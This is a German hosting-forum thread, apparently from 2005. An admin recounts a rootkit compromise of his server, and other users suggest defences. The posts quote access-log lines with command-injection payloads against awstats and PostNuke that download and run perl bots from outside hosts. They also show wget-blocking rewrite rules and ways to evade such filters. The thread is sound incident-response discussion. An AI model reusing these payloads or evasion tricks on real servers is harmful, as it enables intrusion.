server gehackt .. Erlebnisbericht

[art-media]

hi
wollte mal erzählen wie es mir letzte woche ergangen ist.
erstmal zum server
1&1 rootie mit suse 9.1


Donnerstag abend:
conjob von backup ( reoback ) hängt und startet zig gzip prozesse.
händisch korrigiert ... gzip hängt bei großen Dateien.

bitdefender über die komplette platte laufen lassen:
/usr/bin/rbash infected: Linux.OSF.8759
/usr/bin/awk infected: Linux.RST.B
/usr/bin/gawk infected: Linux.RST.B
/usr/bin/grep infected: Linux.RST.B
/usr/bin/gunzip infected: Linux.RST.B
/usr/bin/gzip infected: Linux.RST.B
/usr/bin/uncompress infected: Linux.RST.B
/usr/bin/zcat infected: Linux.RST.B
/usr/bin/top infected: Trojan.Linux.Hacktop
/usr/lib/libsh/.sniff/shsniff infected: Trojan.Linux.Sniffer.Sysniff.A
/usr/lib/libsh/.sniff/shp infected: Worm.Linux.Lion
/usr/lib/libsh/shsb infected: Worm.Linux.Lion
/usr/lib/libsh/hide infected: Trojan.Linux.Rootkit.SH
/bin/netstat infected: Trojan.Linux.Rootkit.N

und weitere
Infected files :168
Alle in /usr/bin und /usr/lib


leider zuviele binary´s um den server wieder sauber zu kriegen.

im messages log finden sich viele nachrichten von connects zum sshd von vielen verschieden hosts aus der ganzen welt.
wie z.bsp. :
May 27 05:08:59 p15160654 sshd[27351]: Failed password for root from ::ffff:211.100.11.138 port 41723 ssh2

oder

May 27 09:57:09 p15160654 sshd[30905]: Did not receive identification string from ::ffff:210.243.238.202

Hab alle logfiles gesichert und den komplett output vom bdc in file gebackuped.

reoback hat leider nur Backups von mysql db´s , etc , web´s , confixx und mailboxen gemacht bei mir (merken :nächstesmal wenigstens einmal die Woche komplett Server backup machen).

bdc hat leider per cron immer nur die mails gecheckt ( merken : nächstesmal wenigstens einmal pro Woche full check damit machen )

Danach bei 1&1 neues Image von Suse 9.1 draufgezogen. neue Passes überall.

Die gesamte Software in den neuesten verfügbaren Versionen draufgezogen ( Zuerst yast und danach Sachen compiled)

backups eingespielt. Leider zwei Tage verloren da gzip infiziert war und nicht mehr tat.

Problem: Imap Server kann hat keine Permission mehr auf die Maildir´s

script geschrieben:

#ändert den benutzer der mailboxen
i=0
x=0
while [ $i -le 25 ]
do
#echo "loop"
while [ $x -le 50 ]
do
argu="-R web"$i"p"$x":poponly web"$i"p"$x
echo $argu
chown $argu
#chown web$i
x=`expr $x + 1`

done
x=0
i=`expr $i + 1`

done


um die benutzer für die mailboxen zu setzen.
Danach taten die Mailboxen über IMAP wieder.

webs laufen mit falscher Combo user:group

#ändert den benutzer der webs
i=1
x=0
while [ $i -le 25 ]
do
#echo "loop"

argu="-R web"$i":www web"$i
echo $argu
chown $argu
#chown web$i

i=`expr $i + 1`

done

danach taten die webs wieder.

teilweise aber falsche chmods für file upload.

mc hat auch falsch angezeigt da.

Kunden haben dies dann per ftp korrigiert. ( Hier nochmal ein super dankeschön an unsere Kunden für ihr großes verständnis )

Backup´s der Logs und Virusliste eingepackt und der Kripo vorbeigebracht. mal kucken ob da was dabei rauskommt ....



Rechner wird immer noch mit Bruteforce angriffen auf verschidene User und Root angegriffen.

Hat jemand noch Hinweise und Ergänzungen was ich noch tun sollte?

Ziemlich entnervte grüße nach der ganzen Aktion an die Super Board Leute hier.

art-media

[art-media]

welche Frage mich dann noch bei dem durchkucken der logs beschäftigt ist wie kann ich bots und echte user unterscheiden.
und wie gehe ich vor um herauszufinden wo der angreifer reingekommen ist.

[lufthansen]

mal ein schuss ins blaue grep mal dir apache logs nach wget

[art-media]

old/access_log_2005_w14-0:38.113.204.44 - - [31/Mar/2005:00:19:33 +0200] "GET
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/var/tmp;
killall%20-9%20perl;wget%2064
.251.5.10/~alexander/bot/bot2.txt;perl%20bot2.txt| HTTP/1.1" 404
1046 "-" "Mozil
la/4.0 (compatible; MSIE 6.0; Windows 98)"

old/access_log_2005_w14-0:38.113.204.44 - - [31/Mar/2005:00:19:33 +0200] "GET /a
wstats/awstats.pl?configdir=|echo%20;cd%20/var/tmp;
killall%20-9%20perl;wget%2064
.251.5.10/~alexander/bot.txt;perl%20bot.txt| HTTP/1.1" 404 1046 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows 98)"

hat awstat da nen injection problem?

sieht aus als hättest recht gehabt das da was ging ... hab leider keine inhalte von /var/tmp mehr und bot.txt gibts da nimmer

ausserdem wurde das postnuke auf nem web versucht zu benutzen:

old/access_log_2004_w53-0:203.41.40.164 - - [27/Dec/2004:16:29:09 +0100] "GET
/modules.php?op=modload&name=Web_Links&file=index&req=viewlink&cid=http://www.visualcoders.net/spy.gif?&
cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;
perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 15561 "-" "LWP::Simple/5.69"

wie gut schützt eigentlich die openbasedir restriction den server hier?

[chris76]

hat awstat da nen injection problem?

http://www.securityfocus.com/archive/1/390368

[Joe User]

sieht aus als hättest recht gehabt das da was ging

Für die Zukunft:

Code: Select all

    RewriteEngine On
    RewriteCond %{QUERY_STRING} (.*)wget%20 [NC]
    RewriteRule .* http://256.256.256.256/ [R=301,L]

wie gut schützt eigentlich die openbasedir restriction den server hier?

Nicht ausreichend...

PS: Alles was "nuke" im Namen trägt, hat auf einem öffentlich zugänglichen Server nichts verloren.

[Outlaw]

@Joe

Wo muss das Rewrite rein ??

In alle Domainroots (per .htaccess) oder in die vhost.conf ??

Gruß Outi

PS: SuSE 9.3 Update schon getestet ?? ;):D

[mausgreck]

Für die Zukunft:

Code: Select all

    RewriteEngine On
    RewriteCond %{QUERY_STRING} (.*)wget%20 [NC]
    RewriteRule .* http://256.256.256.256/ [R=301,L]

Security through obscurity:

Code: Select all

cp /usr/bin/w*et /tmp/blah;/tmp/blah ..

oder

Code: Select all

echo -n "wg" > /tmp/blah;echo -n "et http://..." >> /tmp/blah;/bin/sh /tmp/blah

etc, etc....

[bungeebug]

Man koennte auch zum total Schlag ausholen und wget nur noch fuer den root user brauchbar machen ...

[Joe User]

Security through obscurity:

Soll ich ernsthaft alle Möglichkeiten auf dem Silbertablett präsentieren und dadurch die Bereitschaft zur Selbstinitiative des genervten Lesers in Frage stellen? 8)

@Outi:
Vor die vHosts in der httpd.conf. Das HowTo muss auf Grund fehlender Testmaschine leider noch warten.

[Joe User]

Man koennte auch zum total Schlag ausholen und wget nur noch fuer den root user brauchbar machen ...

Hardcore:

Code: Select all

RewriteCond %{QUERY_STRING} (.*)%20 [NC]

[Outlaw]

@Joe

Danke für die Info. Natürlich meinte ich auch die httpd.conf, bin zu Plesk lastig geworden, wo man ja alles nur noch in ner selbsterstellten vhost.conf editieren soll .... ;):D

Gruß Outi

[r00ty]

Security through obscurity:

Code: Select all

cp /usr/bin/w*et /tmp/blah;/tmp/blah ..

...

da stellt sich halt die Frage ob ein Server gezielt angegriffen wird oder ein Script drauf losgelassen wird. Ich würde mal sagen das in den meisten Fällen ein Script das erledigt und da funktioniert so ein rewrite schon.

[mydani]

Hi,

reicht nicht ein chmod 700 auf wget?

Gruß

[andreask2]

im messages log finden sich viele nachrichten von connects zum sshd von vielen verschieden hosts aus der ganzen welt.
wie z.bsp. :
May 27 05:08:59 p15160654 sshd[27351]: Failed password for root from ::ffff:211.100.11.138 port 41723 ssh2

oder

May 27 09:57:09 p15160654 sshd[30905]: Did not receive identification string from ::ffff:210.243.238.202

http://www.rootforum.org/forum/viewtopic.php?t=31784

[bungeebug]

Hi,

reicht nicht ein chmod 700 auf wget?

Gruß

um wget nur fuer root brauchbar zumachen ja, hilft aber nix wenn noch w3 oder lynx installiert ist. Der findige _hacker_ kommt bestimmt auf die idee.

[Joe User]

Ihr habt die bash vergessen ;)

[lord_pinhead]

Vergesst nicht Curl ;)

Code: Select all

RewriteCond %{QUERY_STRING} (.*)wget|curl|lynx|w3%20 [NC] 

Berichtigt mich wenn ich nen denkfehler mit dem Regexp habe 8)

Gegen SQL und XSS hilft nur ein IDS und hier mal eine nette Anleitung für ein paar Regelsätze. Das sollte auf jeden Fall mal ein großen Teil bis alles ausschalten (dank den Regexp gegen Hexcodes).

Aso, @art-media: Schonmal überlegt von AWStats auf Webalizer zu wechseln? Gibts auf jedenfalls kein Ã?rger wenn wieder ein Bug im AWStats entdeckt wird.

[art-media]

@lord pinhead
ist schon rausgeflogen :)

an den ganzen rest danke ... ist nen voll guter thread dabei rausgekommen